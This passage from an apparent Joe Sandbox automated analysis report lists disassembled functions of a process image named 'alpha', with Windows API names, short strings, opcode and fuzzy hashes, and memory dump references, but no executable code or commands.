                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                                    • String ID: @P
                                                                                                                    • API String ID: 1801357106-3670739982
                                                                                                                    • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                                    • Instruction ID: f7b29c4b608db4cfac12de307c00c804469b4331d3ec91af3c99d4e5c2708dda
                                                                                                                    • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                                    • Instruction Fuzzy Hash: B6416032B04A4ADBE710AF60D4443EDBBB4FB89B5AF944231DA1E57A88DF78D504C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC2220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$BufferConsoleInfoScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1034426908-0
                                                                                                                    • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                                                    • Instruction ID: b2fa228b6b2128a86568e4075111c73df1b432c6a2fd37bde01896a7301dc641
                                                                                                                    • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                                                    • Instruction Fuzzy Hash: E7F1A43270878A8AEB64EF21D8502E9BBB4FF85B99FA04135DA4E47695DF3CE504C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEAC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseValue$CreateDeleteOpen
                                                                                                                    • String ID: %s=%s$\Shell\Open\Command
                                                                                                                    • API String ID: 4081037667-3301834661
                                                                                                                    • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                                    • Instruction ID: 121c8e268fca8e50b266730986fb1635ff02259c133aa7864f4514d69926bac3
                                                                                                                    • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                                    • Instruction Fuzzy Hash: F071C122B0974A82EA60AF55E4502BDEAB9FF85F96FE48131DA4E07784DF3CD441C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEAA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BEAA85
                                                                                                                    • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BEAACF
                                                                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BEAAEC
                                                                                                                    • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF789BE98C0), ref: 00007FF789BEAB39
                                                                                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF789BE98C0), ref: 00007FF789BEAB6F
                                                                                                                    • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF789BE98C0), ref: 00007FF789BEABA4
                                                                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF789BE98C0), ref: 00007FF789BEABCB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseDeleteValue$CreateOpen
                                                                                                                    • String ID: %s=%s
                                                                                                                    • API String ID: 1019019434-1087296587
                                                                                                                    • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                    • Instruction ID: 7cc0154377eafed44a3019c82537d3ea085a5c8921ade8505735a0b2bfc440cc
                                                                                                                    • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                    • Instruction Fuzzy Hash: 04518131B0874A86E760AF65E44476EBEB9FB89F92FA08234CA4D43790DF38D441CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC1884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsnicmpwcsrchr
                                                                                                                    • String ID: COPYCMD
                                                                                                                    • API String ID: 2429825313-3727491224
                                                                                                                    • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                                    • Instruction ID: ce41d2de817a5ce635b628666eee15c85ffdaadbce31804d9a89804a140a32d0
                                                                                                                    • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                                    • Instruction Fuzzy Hash: ACF1B432F0C64A86FB60AF5191441BDBAB5BB04FAAFA04235DE5E236C4DE3CA541C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC4A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$FullNamePathwcsrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4289998964-0
                                                                                                                    • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                                                    • Instruction ID: aae943abb93caee7bf7d8eb2a6b25fe7be53a474d6a214296b4737bba2217297
                                                                                                                    • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                                                    • Instruction Fuzzy Hash: CEC19011A0935E82EA94BF91954837DBBB5FF45FA6FA05531CE0E077D0EE3CA491C220
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEBCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3476366620-0
                                                                                                                    • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                    • Instruction ID: ca4034b9830f5a3bed48918525d36d379520abc757b2d9067776673f982ca57f
                                                                                                                    • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                    • Instruction Fuzzy Hash: 67213C20D0964B86FA547F21E8192B8EE71FF86F57FE48235D45E422E1DF3CA405C220
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC3D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                                    • String ID: %9d
                                                                                                                    • API String ID: 1006866328-2241623522
                                                                                                                    • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                    • Instruction ID: ff1cb26be9dfd7d6c3e2b6697b67d890d35001970e17c30d7042b4fc8f0534cb
                                                                                                                    • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                    • Instruction Fuzzy Hash: DA516F72A082468BE740EF21D8541A8BBB4FB44B69FA04635DA2D537D5CF3DE500CB20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC8DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2221118986-0
                                                                                                                    • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                                                    • Instruction ID: d4bb1f73b970612e71358c105fbf0c62a92b2d2e6c9fa73d68f0c92f9d912026
                                                                                                                    • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                                                    • Instruction Fuzzy Hash: 1EC10722A0978A86EB60EF21E854AF9ABB0FF95F59FA44535DA0D47790DF3CD140C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC9B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1357844191-0
                                                                                                                    • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                                    • Instruction ID: 741c4b9477a0c0ae840ae0d00e3d9c25a96c10fa7f684a2926ed59a64a68ac2f
                                                                                                                    • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                                    • Instruction Fuzzy Hash: 33A1C321A0869A82FB54BF25A45567AEAB0FF88F96FE04135DD4E83791DE3DE401C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEFB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$DiskFreeSpace
                                                                                                                    • String ID: %5lu
                                                                                                                    • API String ID: 2448137811-2100233843
                                                                                                                    • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                                                                    • Instruction ID: b9b74c772823cee29df94f2d028efbccfadf6d1e675347f7460600c5c318d307
                                                                                                                    • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                                                                    • Instruction Fuzzy Hash: CF41A322709AC985EB60EF21E8446EAB771FB84B89F908031DE4D0B748DF7CD149C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCD250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmp
                                                                                                                    • String ID: GeToken: (%x) '%s'
                                                                                                                    • API String ID: 2081463915-1994581435
                                                                                                                    • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                    • Instruction ID: 70fd25d74da47d12fb716eef386bc8dc117f4746264db55345f3ca8141e561f9
                                                                                                                    • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                    • Instruction Fuzzy Hash: F1719E24E0C68BC6FBA4BF65E444275AAB0BF40FAAFF40535D50D466A1DF3DA881C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC81D4 Relevance: 4.8, APIs: 3, Instructions: 299COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1497570035-0
                                                                                                                    • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                                                    • Instruction ID: 31cd90be6b163c8b71dfad9a14f26821a0496340057305e2d3c4dae46a683241
                                                                                                                    • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                                                    • Instruction Fuzzy Hash: 41C10621A1869A82EA54BF11E4442BDEFB0FF84F9AFA44135EA5E476D5DF3CE440C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE7B4C Relevance: 4.8, APIs: 3, Instructions: 269fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3541575487-0
                                                                                                                    • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                                                    • Instruction ID: a9992facd20acd4269a3bc22e884dd69020e74a3a0ad837b9447a31a30c05661
                                                                                                                    • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                                                    • Instruction Fuzzy Hash: 87A10661B1829A45EE14AF65945427DEAB9BF44FE6FA44230EE6E477C4EE3CE401C310
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

